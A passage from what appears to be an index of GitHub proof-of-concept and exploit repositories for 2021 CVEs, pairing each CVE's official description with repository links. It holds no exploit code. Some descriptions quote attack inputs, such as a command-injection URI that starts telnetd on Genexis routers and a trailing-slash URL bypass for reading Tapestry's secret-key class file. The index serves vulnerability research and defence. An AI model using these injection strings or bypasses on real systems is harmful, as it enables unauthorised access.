[toowoxx/docker-confluence-patched](https://github.com/toowoxx/docker-confluence-patched) +- [nizar0x1f/CVE-2021-26084-patch-](https://github.com/nizar0x1f/CVE-2021-26084-patch-) +- [attacker-codeninja/CVE-2021-26084](https://github.com/attacker-codeninja/CVE-2021-26084) +- [ludy-dev/CVE-2021-26084_PoC](https://github.com/ludy-dev/CVE-2021-26084_PoC) +- [wdjcy/CVE-2021-26084](https://github.com/wdjcy/CVE-2021-26084) +- [orangmuda/CVE-2021-26084](https://github.com/orangmuda/CVE-2021-26084) +- [TheclaMcentire/CVE-2021-26084_Confluence](https://github.com/TheclaMcentire/CVE-2021-26084_Confluence) +- [Jun-5heng/CVE-2021-26084](https://github.com/Jun-5heng/CVE-2021-26084) +- [lleavesl/CVE-2021-26084](https://github.com/lleavesl/CVE-2021-26084) +- [quesodipesto/conflucheck](https://github.com/quesodipesto/conflucheck) +- [30579096/Confluence-CVE-2021-26084](https://github.com/30579096/Confluence-CVE-2021-26084) +- [ZZ-SOCMAP/CVE-2021-26084](https://github.com/ZZ-SOCMAP/CVE-2021-26084) +- [vpxuser/CVE-2021-26084-EXP](https://github.com/vpxuser/CVE-2021-26084-EXP) +- [nahcusira/CVE-2021-26084](https://github.com/nahcusira/CVE-2021-26084) +- [BBD-YZZ/Confluence-RCE](https://github.com/BBD-YZZ/Confluence-RCE) + +### CVE-2021-26085 (2021-08-03) + +Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3. + + +- [ColdFusionX/CVE-2021-26085](https://github.com/ColdFusionX/CVE-2021-26085) + +### CVE-2021-26086 (2021-08-16) + +Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1. + + +- [Jeromeyoung/CVE-2021-26086](https://github.com/Jeromeyoung/CVE-2021-26086) +- [ColdFusionX/CVE-2021-26086](https://github.com/ColdFusionX/CVE-2021-26086) + +### CVE-2021-26088 (2021-07-12) + +An improper authentication vulnerability in FSSO Collector version 5.0.295 and below may allow an unauthenticated user to bypass a FSSO firewall policy and access the protected network via sending specifically crafted UDP login notification packets. + + +- [theogobinet/CVE-2021-26088](https://github.com/theogobinet/CVE-2021-26088) + +### CVE-2021-26102 +- [SleepyCofe/CVE-2021-26102](https://github.com/SleepyCofe/CVE-2021-26102) + +### CVE-2021-26121 +- [sourceincite/CVE-2021-26121](https://github.com/sourceincite/CVE-2021-26121) + +### CVE-2021-26258 (2022-05-12) + +Improper access control for the Intel(R) Killer(TM) Control Center software before version 2.4.3337.0 may allow an authorized user to potentially enable escalation of privilege via local access. + + +- [zwclose/CVE-2021-26258](https://github.com/zwclose/CVE-2021-26258) + +### CVE-2021-26295 (2021-03-22) + +Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. + + +- [yumusb/CVE-2021-26295](https://github.com/yumusb/CVE-2021-26295) +- [rakjong/CVE-2021-26295-Apache-OFBiz](https://github.com/rakjong/CVE-2021-26295-Apache-OFBiz) +- [dskho/CVE-2021-26295](https://github.com/dskho/CVE-2021-26295) +- [coolyin001/CVE-2021-26295--](https://github.com/coolyin001/CVE-2021-26295--) +- [yuaneuro/ofbiz-poc](https://github.com/yuaneuro/ofbiz-poc) + +### CVE-2021-26411 (2021-03-11) + +Internet Explorer Memory Corruption Vulnerability + + +- [CrackerCat/CVE-2021-26411](https://github.com/CrackerCat/CVE-2021-26411) + +### CVE-2021-26414 (2021-06-08) + +Windows DCOM Server Security Feature Bypass + + +- [Nels2/dcom_10036_Solver](https://github.com/Nels2/dcom_10036_Solver) + +### CVE-2021-26415 (2021-04-13) + +Windows Installer Elevation of Privilege Vulnerability + + +- [adenkiewicz/CVE-2021-26415](https://github.com/adenkiewicz/CVE-2021-26415) + +### CVE-2021-26690 (2021-06-10) + +Apache HTTP Server versions 2.4.0 to 2.4.46 A specially crafted Cookie header handled by mod_session can cause a NULL pointer dereference and crash, leading to a possible Denial Of Service + + +- [dja2TaqkGEEfA45/CVE-2021-26690](https://github.com/dja2TaqkGEEfA45/CVE-2021-26690) +- [7own/CVE-2021-26690---Apache-mod_session](https://github.com/7own/CVE-2021-26690---Apache-mod_session) + +### CVE-2021-26691 (2021-06-10) + +In Apache HTTP Server versions 2.4.0 to 2.4.46 a specially crafted SessionHeader sent by an origin server could cause a heap overflow + + +- [dja2TaqkGEEfA45/CVE-2021-26691](https://github.com/dja2TaqkGEEfA45/CVE-2021-26691) + +### CVE-2021-26700 (2021-02-25) + +Visual Studio Code npm-script Extension Remote Code Execution Vulnerability + + +- [jackadamson/CVE-2021-26700](https://github.com/jackadamson/CVE-2021-26700) +- [june-in-exile/CVE-2021-26700](https://github.com/june-in-exile/CVE-2021-26700) + +### CVE-2021-26708 (2021-02-05) + +A local privilege escalation was discovered in the Linux kernel before 5.10.13. Multiple race conditions in the AF_VSOCK implementation are caused by wrong locking in net/vmw_vsock/af_vsock.c. The race conditions were implicitly introduced in the commits that added VSOCK multi-transport support. + + +- [jordan9001/vsock_poc](https://github.com/jordan9001/vsock_poc) +- [azpema/CVE-2021-26708](https://github.com/azpema/CVE-2021-26708) + +### CVE-2021-26714 (2021-03-29) + +The Enterprise License Manager portal in Mitel MiContact Center Enterprise before 9.4 could allow a user to access restricted files and folders due to insufficient access control. A successful exploit could allow an attacker to view and modify application data via Directory Traversal. + + +- [PwCNO-CTO/CVE-2021-26714](https://github.com/PwCNO-CTO/CVE-2021-26714) + +### CVE-2021-26814 (2021-03-06) + +Wazuh API in Wazuh from 4.0.0 to 4.0.3 allows authenticated users to execute arbitrary code with administrative privileges via /manager/files URI. An authenticated user to the service may exploit incomplete input validation on the /manager/files API to inject arbitrary code within the API service script. + + +- [WickdDavid/CVE-2021-26814](https://github.com/WickdDavid/CVE-2021-26814) +- [CYS4srl/CVE-2021-26814](https://github.com/CYS4srl/CVE-2021-26814) +- [paolorabbito/Internet-Security-Project---CVE-2021-26814](https://github.com/paolorabbito/Internet-Security-Project---CVE-2021-26814) + +### CVE-2021-26828 (2021-06-11) + +OpenPLC ScadaBR through 0.9.1 on Linux and through 1.12.4 on Windows allows remote authenticated users to upload and execute arbitrary JSP files via view_edit.shtm. + + +- [hev0x/CVE-2021-26828_ScadaBR_RCE](https://github.com/hev0x/CVE-2021-26828_ScadaBR_RCE) + +### CVE-2021-26832 (2021-04-14) + +Cross Site Scripting (XSS) in the "Reset Password" page form of Priority Enterprise Management System v8.00 allows attackers to execute javascript on behalf of the victim by sending a malicious URL or directing the victim to a malicious site. + + +- [NagliNagli/CVE-2021-26832](https://github.com/NagliNagli/CVE-2021-26832) + +### CVE-2021-26855 (2021-03-02) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [sgnls/exchange-0days-202103](https://github.com/sgnls/exchange-0days-202103) +- [soteria-security/HAFNIUM-IOC](https://github.com/soteria-security/HAFNIUM-IOC) +- [cert-lv/exchange_webshell_detection](https://github.com/cert-lv/exchange_webshell_detection) +- [conjojo/Microsoft_Exchange_Server_SSRF_CVE-2021-26855](https://github.com/conjojo/Microsoft_Exchange_Server_SSRF_CVE-2021-26855) +- [pussycat0x/CVE-2021-26855-SSRF](https://github.com/pussycat0x/CVE-2021-26855-SSRF) +- [La3B0z/CVE-2021-26855-SSRF-Exchange](https://github.com/La3B0z/CVE-2021-26855-SSRF-Exchange) +- [mekhalleh/exchange_proxylogon](https://github.com/mekhalleh/exchange_proxylogon) +- [Yt1g3r/CVE-2021-26855_SSRF](https://github.com/Yt1g3r/CVE-2021-26855_SSRF) +- [hackerxj007/CVE-2021-26855](https://github.com/hackerxj007/CVE-2021-26855) +- [dwisiswant0/proxylogscan](https://github.com/dwisiswant0/proxylogscan) +- [mauricelambert/ExchangeWeaknessTest](https://github.com/mauricelambert/ExchangeWeaknessTest) +- [DCScoder/Exchange_IOC_Hunter](https://github.com/DCScoder/Exchange_IOC_Hunter) +- [srvaccount/CVE-2021-26855-PoC](https://github.com/srvaccount/CVE-2021-26855-PoC) +- [h4x0r-dz/CVE-2021-26855](https://github.com/h4x0r-dz/CVE-2021-26855) +- [alt3kx/CVE-2021-26855_PoC](https://github.com/alt3kx/CVE-2021-26855_PoC) +- [r0xdeadbeef/CVE-2021-26855](https://github.com/r0xdeadbeef/CVE-2021-26855) +- [hackerschoice/CVE-2021-26855](https://github.com/hackerschoice/CVE-2021-26855) +- [SCS-Labs/HAFNIUM-Microsoft-Exchange-0day](https://github.com/SCS-Labs/HAFNIUM-Microsoft-Exchange-0day) +- [KotSec/CVE-2021-26855-Scanner](https://github.com/KotSec/CVE-2021-26855-Scanner) +- [hakivvi/proxylogon](https://github.com/hakivvi/proxylogon) +- [ZephrFish/Exch-CVE-2021-26855](https://github.com/ZephrFish/Exch-CVE-2021-26855) +- [mil1200/ProxyLogon-CVE-2021-26855](https://github.com/mil1200/ProxyLogon-CVE-2021-26855) +- [evilashz/ExchangeSSRFtoRCEExploit](https://github.com/evilashz/ExchangeSSRFtoRCEExploit) +- [ZephrFish/Exch-CVE-2021-26855_Priv](https://github.com/ZephrFish/Exch-CVE-2021-26855_Priv) +- [Mr-xn/CVE-2021-26855-d](https://github.com/Mr-xn/CVE-2021-26855-d) +- [RickGeex/ProxyLogon](https://github.com/RickGeex/ProxyLogon) +- [Immersive-Labs-Sec/ProxyLogon](https://github.com/Immersive-Labs-Sec/ProxyLogon) +- [shacojx/Scan-Vuln-CVE-2021-26855](https://github.com/shacojx/Scan-Vuln-CVE-2021-26855) +- [TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit](https://github.com/TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit) +- [p0wershe11/ProxyLogon](https://github.com/p0wershe11/ProxyLogon) +- [shacojx/CVE-2021-26855-exploit-Exchange](https://github.com/shacojx/CVE-2021-26855-exploit-Exchange) +- [catmandx/CVE-2021-26855-Exchange-RCE](https://github.com/catmandx/CVE-2021-26855-Exchange-RCE) +- [hictf/CVE-2021-26855-CVE-2021-27065](https://github.com/hictf/CVE-2021-26855-CVE-2021-27065) +- [praetorian-inc/proxylogon-exploit](https://github.com/praetorian-inc/proxylogon-exploit) +- [Flangvik/SharpProxyLogon](https://github.com/Flangvik/SharpProxyLogon) +- [hosch3n/ProxyVulns](https://github.com/hosch3n/ProxyVulns) +- [Nick-Yin12/106362522](https://github.com/Nick-Yin12/106362522) +- [yaoxiaoangry3/Flangvik](https://github.com/yaoxiaoangry3/Flangvik) +- [thau0x01/poc_proxylogon](https://github.com/thau0x01/poc_proxylogon) +- [1342486672/Flangvik](https://github.com/1342486672/Flangvik) +- [TheDudeD6/ExchangeSmash](https://github.com/TheDudeD6/ExchangeSmash) +- [kh4sh3i/ProxyLogon](https://github.com/kh4sh3i/ProxyLogon) +- [ssrsec/Microsoft-Exchange-RCE](https://github.com/ssrsec/Microsoft-Exchange-RCE) +- [glen-pearson/ProxyLogon-CVE-2021-26855](https://github.com/glen-pearson/ProxyLogon-CVE-2021-26855) +- [MacAsure/cve-2021-26855](https://github.com/MacAsure/cve-2021-26855) +- [timb-machine-mirrors/testanull-CVE-2021-26855_read_poc.txt](https://github.com/timb-machine-mirrors/testanull-CVE-2021-26855_read_poc.txt) + +### CVE-2021-26856 +- [avi8892/CVE-2021-26856](https://github.com/avi8892/CVE-2021-26856) + +### CVE-2021-26857 (2021-03-02) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [sirpedrotavares/Proxylogon-exploit](https://github.com/sirpedrotavares/Proxylogon-exploit) + +### CVE-2021-26868 (2021-03-11) + +Windows Graphics Component Elevation of Privilege Vulnerability + + +- [KangD1W2/CVE-2021-26868](https://github.com/KangD1W2/CVE-2021-26868) + +### CVE-2021-26871 (2021-03-11) + +Windows WalletService Elevation of Privilege Vulnerability + + +- [fr4nkxixi/CVE-2021-26871_POC](https://github.com/fr4nkxixi/CVE-2021-26871_POC) + +### CVE-2021-26882 (2021-03-11) + +Remote Access API Elevation of Privilege Vulnerability + + +- [taiji-xo/CVE-2021-26882](https://github.com/taiji-xo/CVE-2021-26882) + +### CVE-2021-26903 (2021-02-26) + +LMA ISIDA Retriever 5.2 is vulnerable to XSS via query['text']. + + +- [Security-AVS/CVE-2021-26903](https://github.com/Security-AVS/CVE-2021-26903) + +### CVE-2021-26904 (2021-02-26) + +LMA ISIDA Retriever 5.2 allows SQL Injection. + + +- [Security-AVS/-CVE-2021-26904](https://github.com/Security-AVS/-CVE-2021-26904) + +### CVE-2021-26943 (2021-03-31) + +The UX360CA BIOS through 303 on ASUS laptops allow an attacker (with the ring 0 privilege) to overwrite nearly arbitrary physical memory locations, including SMRAM, and execute arbitrary code in the SMM (issue 3 of 3). + + +- [tandasat/SmmExploit](https://github.com/tandasat/SmmExploit) + +### CVE-2021-27065 (2021-03-02) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [adamrpostjr/cve-2021-27065](https://github.com/adamrpostjr/cve-2021-27065) + +### CVE-2021-27180 (2021-04-14) + +An issue was discovered in MDaemon before 20.0.4. There is Reflected XSS in Webmail (aka WorldClient). It can be exploited via a GET request. It allows performing any action with the privileges of the attacked user. + + +- [chudyPB/MDaemon-Advisories](https://github.com/chudyPB/MDaemon-Advisories) + +### CVE-2021-27187 (2021-02-12) + +The Sovremennye Delovye Tekhnologii FX Aggregator terminal client 1 stores authentication credentials in cleartext in login.sav when the Save Password box is checked. + + +- [jet-pentest/CVE-2021-27187](https://github.com/jet-pentest/CVE-2021-27187) + +### CVE-2021-27188 (2021-02-12) + +The Sovremennye Delovye Tekhnologii FX Aggregator terminal client 1 allows attackers to cause a denial of service (access suspended for five hours) by making five invalid login attempts to a victim's account. + + +- [jet-pentest/CVE-2021-27188](https://github.com/jet-pentest/CVE-2021-27188) + +### CVE-2021-27190 (2021-02-12) + +A Stored Cross Site Scripting(XSS) Vulnerability was discovered in PEEL SHOPPING 9.3.0 and 9.4.0, which are publicly available. The user supplied input containing polyglot payload is echoed back in javascript code in HTML response. This allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc. + + +- [anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS](https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS) + +### CVE-2021-27198 (2021-02-26) + +An issue was discovered in Visualware MyConnection Server before v11.1a. Unauthenticated Remote Code Execution can occur via Arbitrary File Upload in the web service when using a myspeed/sf?filename= URI. This application is written in Java and is thus cross-platform. The Windows installation runs as SYSTEM, which means that exploitation gives one Administrator privileges on the target system. + + +- [rwincey/CVE-2021-27198](https://github.com/rwincey/CVE-2021-27198) + +### CVE-2021-27211 (2021-02-15) + +steghide 0.5.1 relies on a certain 32-bit seed value, which makes it easier for attackers to detect hidden data. + + +- [b4shfire/stegcrack](https://github.com/b4shfire/stegcrack) + +### CVE-2021-27246 (2021-04-14) + +This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Archer A7 AC1750 1.0.15 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of MAC addresses by the tdpServer endpoint. A crafted TCP message can write stack pointers to the stack. An attacker can leverage this vulnerability to execute code in the context of the root user. Was ZDI-CAN-12306. + + +- [synacktiv/CVE-2021-27246_Pwn2Own2020](https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020) + +### CVE-2021-27328 (2021-02-19) + +Yeastar NeoGate TG400 91.3.0.3 devices are affected by Directory Traversal. An authenticated user can decrypt firmware and can read sensitive information, such as a password or decryption key. + + +- [SQSamir/CVE-2021-27328](https://github.com/SQSamir/CVE-2021-27328) + +### CVE-2021-27338 (2021-07-20) + +Faraday Edge before 3.7 allows XSS via the network/create/ page and its network name parameter. + + +- [Pho03niX/CVE-2021-27338](https://github.com/Pho03niX/CVE-2021-27338) + +### CVE-2021-27342 (2021-05-17) + +An authentication brute-force protection mechanism bypass in telnetd in D-Link Router model DIR-842 firmware version 3.0.2 allows a remote attacker to circumvent the anti-brute-force cool-down delay period via a timing-based side-channel attack + + +- [mavlevin/D-Link-CVE-2021-27342-exploit](https://github.com/mavlevin/D-Link-CVE-2021-27342-exploit) + +### CVE-2021-27403 (2021-02-19) + +Askey RTF8115VW BR_SV_g11.11_RTF_TEF001_V6.54_V014 devices allow cgi-bin/te_acceso_router.cgi curWebPage XSS. + + +- [bokanrb/CVE-2021-27403](https://github.com/bokanrb/CVE-2021-27403) + +### CVE-2021-27404 (2021-02-19) + +Askey RTF8115VW BR_SV_g11.11_RTF_TEF001_V6.54_V014 devices allow injection of a Host HTTP header. + + +- [bokanrb/CVE-2021-27404](https://github.com/bokanrb/CVE-2021-27404) + +### CVE-2021-27513 (2021-02-21) + +The module admin_ITSM in EyesOfNetwork 5.3-10 allows remote authenticated users to upload arbitrary .xml.php files because it relies on "le filtre userside." + + +- [ArianeBlow/CVE-2021-27513-CVE-2021-27514](https://github.com/ArianeBlow/CVE-2021-27513-CVE-2021-27514) +- [ArianeBlow/CVE-2021-27513](https://github.com/ArianeBlow/CVE-2021-27513) + +### CVE-2021-27651 (2021-04-29) + +In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks. + + +- [samwcyo/CVE-2021-27651-PoC](https://github.com/samwcyo/CVE-2021-27651-PoC) +- [Vulnmachines/CVE-2021-27651](https://github.com/Vulnmachines/CVE-2021-27651) +- [orangmuda/CVE-2021-27651](https://github.com/orangmuda/CVE-2021-27651) + +### CVE-2021-27850 (2021-04-15) + +A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. An attacker was able to download the file `AppModule.class` by requesting the URL `http://localhost:8080/assets/something/services/AppModule.class` which contains a HMAC secret key. The fix for that bug was a blacklist filter that checks if the URL ends with `.class`, `.properties` or `.xml`. Bypass: Unfortunately, the blacklist solution can simply be bypassed by appending a `/` at the end of the URL: `http://localhost:8080/assets/something/services/AppModule.class/` The slash is stripped after the blacklist check and the file `AppModule.class` is loaded into the response. This class usually contains the HMAC secret key which is used to sign serialized Java objects. With the knowledge of that key an attacker can sign a Java gadget chain that leads to RCE (e.g. CommonsBeanUtils1 from ysoserial). Solution for this vulnerability: * For Apache Tapestry 5.4.0 to 5.6.1, upgrade to 5.6.2 or later. * For Apache Tapestry 5.7.0, upgrade to 5.7.1 or later. + + +- [kahla-sec/CVE-2021-27850_POC](https://github.com/kahla-sec/CVE-2021-27850_POC) +- [dorkerdevil/CVE-2021-27850_POC](https://github.com/dorkerdevil/CVE-2021-27850_POC) +- [Ovi3/CVE_2021_27850_POC](https://github.com/Ovi3/CVE_2021_27850_POC) +- [novysodope/CVE-2021-27850](https://github.com/novysodope/CVE-2021-27850) + +### CVE-2021-27890 (2021-03-15) + +SQL Injection vulnerablity in MyBB before 1.8.26 via theme properties included in theme XML files. + + +- [xiaopan233/Mybb-XSS_SQL_RCE-POC](https://github.com/xiaopan233/Mybb-XSS_SQL_RCE-POC) + +### CVE-2021-27905 (2021-04-13) + +The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2. + + +- [Henry4E36/Solr-SSRF](https://github.com/Henry4E36/Solr-SSRF) +- [W2Ning/Solr-SSRF](https://github.com/W2Ning/Solr-SSRF) +- [murataydemir/CVE-2021-27905](https://github.com/murataydemir/CVE-2021-27905) +- [pdelteil/CVE-2021-27905.POC](https://github.com/pdelteil/CVE-2021-27905.POC) + +### CVE-2021-27928 (2021-03-19) + +A remote code execution issue was discovered in MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL. An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd. NOTE: this does not affect an Oracle product. + + +- [Al1ex/CVE-2021-27928](https://github.com/Al1ex/CVE-2021-27928) +- [shamo0/CVE-2021-27928-POC](https://github.com/shamo0/CVE-2021-27928-POC) +- [LalieA/CVE-2021-27928](https://github.com/LalieA/CVE-2021-27928) + +### CVE-2021-27963 (2021-03-05) + +SonLogger before 6.4.1 is affected by user creation with any user permissions profile (e.g., SuperAdmin). An anonymous user can send a POST request to /User/saveUser without any authentication or session header. + + +- [erberkan/SonLogger-vulns](https://github.com/erberkan/SonLogger-vulns) + +### CVE-2021-27965 (2021-03-05) + +The MsIo64.sys driver before 1.1.19.1016 in MSI Dragon Center before 2.0.98.0 has a buffer overflow that allows privilege escalation via a crafted 0x80102040, 0x80102044, 0x80102050, or 0x80102054 IOCTL request. + + +- [mathisvickie/CVE-2021-27965](https://github.com/mathisvickie/CVE-2021-27965) +- [Jeromeyoung/CVE-2021-27965](https://github.com/Jeromeyoung/CVE-2021-27965) +- [fengjixuchui/CVE-2021-27965](https://github.com/fengjixuchui/CVE-2021-27965) + +### CVE-2021-28079 (2021-04-26) + +Jamovi <=1.6.18 is affected by a cross-site scripting (XSS) vulnerability. The column-name is vulnerable to XSS in the ElectronJS Framework. An attacker can make a .omv (Jamovi) document containing a payload. When opened by victim, the payload is triggered. + + +- [g33xter/CVE-2021-28079](https://github.com/g33xter/CVE-2021-28079) + +### CVE-2021-28164 (2021-04-01) + +In Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224, the default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. + + +- [jammy0903/-jettyCVE-2021-28164-](https://github.com/jammy0903/-jettyCVE-2021-28164-) + +### CVE-2021-28165 (2021-04-01) + +In Eclipse Jetty 7.2.2 to 9.4.38, 10.0.0.alpha0 to 10.0.1, and 11.0.0.alpha0 to 11.0.1, CPU usage can reach 100% upon receiving a large invalid TLS frame. + + +- [uthrasri/CVE-2021-28165](https://github.com/uthrasri/CVE-2021-28165) +- [hshivhare67/Jetty_v9.4.31_CVE-2021-28165](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2021-28165) + +### CVE-2021-28310 (2021-04-13) + +Win32k Elevation of Privilege Vulnerability + + +- [Rafael-Svechinskaya/IOC_for_CVE-2021-28310](https://github.com/Rafael-Svechinskaya/IOC_for_CVE-2021-28310) + +### CVE-2021-28312 (2021-04-13) + +Windows NTFS Denial of Service Vulnerability + + +- [shubham0d/CVE-2021-28312](https://github.com/shubham0d/CVE-2021-28312) + +### CVE-2021-28378 (2021-03-15) + +Gitea 1.12.x and 1.13.x before 1.13.4 allows XSS via certain issue data in some situations. + + +- [pandatix/CVE-2021-28378](https://github.com/pandatix/CVE-2021-28378) + +### CVE-2021-28476 (2021-05-11) + +Windows Hyper-V Remote Code Execution Vulnerability + + +- [0vercl0k/CVE-2021-28476](https://github.com/0vercl0k/CVE-2021-28476) +- [bluefrostsecurity/CVE-2021-28476](https://github.com/bluefrostsecurity/CVE-2021-28476) +- [LaCeeKa/CVE-2021-28476-tools-env](https://github.com/LaCeeKa/CVE-2021-28476-tools-env) +- [australeo/CVE-2021-28476](https://github.com/australeo/CVE-2021-28476) +- [2273852279qqs/0vercl0k](https://github.com/2273852279qqs/0vercl0k) +- [dengyang123x/0vercl0k](https://github.com/dengyang123x/0vercl0k) + +### CVE-2021-28480 (2021-04-13) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [ZephrFish/CVE-2021-28480_HoneyPoC3](https://github.com/ZephrFish/CVE-2021-28480_HoneyPoC3) +- [Threonic/CVE-2021-28480](https://github.com/Threonic/CVE-2021-28480) + +### CVE-2021-28482 (2021-04-13) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [Shadow0ps/CVE-2021-28482-Exchange-POC](https://github.com/Shadow0ps/CVE-2021-28482-Exchange-POC) +- [KevinWorst/CVE-2021-28482_Exploit](https://github.com/KevinWorst/CVE-2021-28482_Exploit) + +### CVE-2021-28663 (2021-05-10) + +The Arm Mali GPU kernel driver allows privilege escalation or information disclosure because GPU memory operations are mishandled, leading to a use-after-free. This affects Bifrost r0p0 through r28p0 before r29p0, Valhall r19p0 through r28p0 before r29p0, and Midgard r4p0 through r30p0. + + +- [lntrx/CVE-2021-28663](https://github.com/lntrx/CVE-2021-28663) + +### CVE-2021-29002 (2021-03-24) + +A stored cross-site scripting (XSS) vulnerability in Plone CMS 5.2.3 exists in site-controlpanel via the "form.widgets.site_title" parameter. + + +- [miguelc49/CVE-2021-29002-1](https://github.com/miguelc49/CVE-2021-29002-1) + +### CVE-2021-29003 (2021-04-13) + +Genexis PLATINUM 4410 2.1 P4410-V2-1.28 devices allow remote attackers to execute arbitrary code via shell metacharacters to sys_config_valid.xgi, as demonstrated by the sys_config_valid.xgi?exeshell=%60telnetd%20%26%60 URI. + + +- [jaysharma786/CVE-2021-29003](https://github.com/jaysharma786/CVE-2021-29003) + +### CVE-2021-29155 (2021-04-20) + +An issue was discovered in the Linux kernel through 5.11.x. kernel/bpf/verifier.c performs undesirable out-of-bounds speculation on pointer arithmetic, leading to side-channel attacks that defeat Spectre mitigations and obtain sensitive information from kernel memory. Specifically, for sequences of pointer arithmetic operations, the pointer modification performed by the first operation is not correctly accounted for when restricting subsequent operations. + + +- [benschlueter/CVE-2021-29155](https://github.com/benschlueter/CVE-2021-29155) + +### CVE-2021-29156 (2021-03-25) + +ForgeRock OpenAM before 13.5.1 allows LDAP injection via the Webfinger protocol. For example, an unauthenticated attacker can perform character-by-character retrieval of password hashes, or retrieve a session token or a private key. + + +- [guidepointsecurity/CVE-2021-29156](https://github.com/guidepointsecurity/CVE-2021-29156) +- [5amu/CVE-2021-29156](https://github.com/5amu/CVE-2021-29156) + +### CVE-2021-29200 (2021-04-27) + +Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack + + +- [freeide/CVE-2021-29200](https://github.com/freeide/CVE-2021-29200) + +### CVE-2021-29267 (2021-03-29) + +Sherlock SherlockIM through 2021-03-29 allows Cross Site Scripting (XSS) by leveraging the api/Files/Attachment URI to attack help-desk staff via the chatbot feature. + + +- [Security-AVS/CVE-2021-29267](https://github.com/Security-AVS/CVE-2021-29267) + +### CVE-2021-29337 (2021-06-21) + +MODAPI.sys in MSI Dragon Center 2.0.104.0 allows low-privileged users to access kernel memory and potentially escalate privileges via a crafted IOCTL 0x9c406104 call. This IOCTL provides the MmMapIoSpace feature for mapping physical memory. + + +- [rjt-gupta/CVE-2021-29337](https://github.com/rjt-gupta/CVE-2021-29337) + +### CVE-2021-29349 (2021-03-31) + +Mahara 20.10 is affected by Cross Site Request Forgery (CSRF) that allows a remote attacker to remove inbox-mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft a module/multirecipientnotification/inbox.php pieform_delete_all_notifications request, which leads to removing all messages from a mailbox. + + +- [0xBaz/CVE-2021-29349](https://github.com/0xBaz/CVE-2021-29349) +- [Vulnmachines/CVE-2021-29349](https://github.com/Vulnmachines/CVE-2021-29349) + +### CVE-2021-29440 (2021-04-13) + +Grav is a file based Web-platform. Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance. The issue was addressed in version 1.7.11. + + +- [CsEnox/CVE-2021-29440](https://github.com/CsEnox/CVE-2021-29440) + +### CVE-2021-29441 (2021-04-27) + +Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true) Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to carry out any administrative tasks on the Nacos server. + + +- [hh-hunter/nacos-cve-2021-29441](https://github.com/hh-hunter/nacos-cve-2021-29441) +- [bysinks/CVE-2021-29441](https://github.com/bysinks/CVE-2021-29441) + +### CVE-2021-29442 (2021-04-27) + +Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql) + + +- [VictorShem/QVD-2024-26473](https://github.com/VictorShem/QVD-2024-26473) +- [XiaomingX/cve-2021-29442-Nacos-Derby-rce-exp](https://github.com/XiaomingX/cve-2021-29442-Nacos-Derby-rce-exp) + +### CVE-2021-29447 (2021-04-15) + +Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled. + + +- [motikan2010/CVE-2021-29447](https://github.com/motikan2010/CVE-2021-29447) +- 